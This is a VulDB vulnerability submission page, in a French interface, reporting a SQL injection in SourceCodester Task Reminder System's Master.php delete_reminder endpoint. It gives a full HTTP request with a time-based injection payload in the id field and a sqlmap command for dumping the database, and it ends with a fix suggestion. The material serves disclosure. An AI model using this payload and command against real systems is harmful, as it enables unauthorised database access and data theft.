Soumettre #228610: SourceCodester Task Management System sql injection in Master.phpinformation

TitreSourceCodester Task Management System sql injection in Master.php
DescriptionI find a SQL injection vulnerability in the SourceCodester Task Management System(https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html) This affect the file /php-trs/classes/Master.php?f=delete_reminder: POST /php-trs/classes/Master.php?f=delete_reminder HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/php-trs/admin/?page=reminders/manage_reminder&id=6 Cookie: ajs_anonymous_id=b6bc95f0-ab68-41ad-85fc-5a73232f365a; ajs_user_id=048546bfc1e19205a55a5993547bc9308acf5a9c; PHPSESSID=v50trgss5tkq84rfr78hjj7g1h Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin user_id=1&title=1&description=1&remind_from=0011-01-01&remind_to=0222-01-01&status=1&id=1'and sleep(4)# Then you will feel that the server's response time has obviously become longer, and this proves that our sql statement was successfully executed. Then you can save the request package as 1.txt, and then use sqlmap to inject it. The command is "sqlmap -r 1.txt --data="id=1", and then you can successfully drag the library The vulnerability arises from the usage of the code "UPDATE `reminder_list` set {$data} where id = '{$id}'" without implementing sufficient filtering on the controllable parameter id. This lack of proper filtering exposes the potential for SQL injection attacks. To address this issue, my recommendation is to protect the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
La source⚠️ https://www.sourcecodester.com/php/16451/task-reminder-system-php-and-mysql-source-code-free-download.html
Utilisateur
 fushuling (UID 45488)
Soumission26/10/2023 19:01 (il y a 3 ans)
Modérer26/10/2023 20:21 (1 hour later)
StatutAccepté
Entrée VulDB243644 [SourceCodester Task Reminder System 1.0 Master.php?f=delete_reminder ID injection SQL]
Points20

PrécédentAperçuSuivant

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!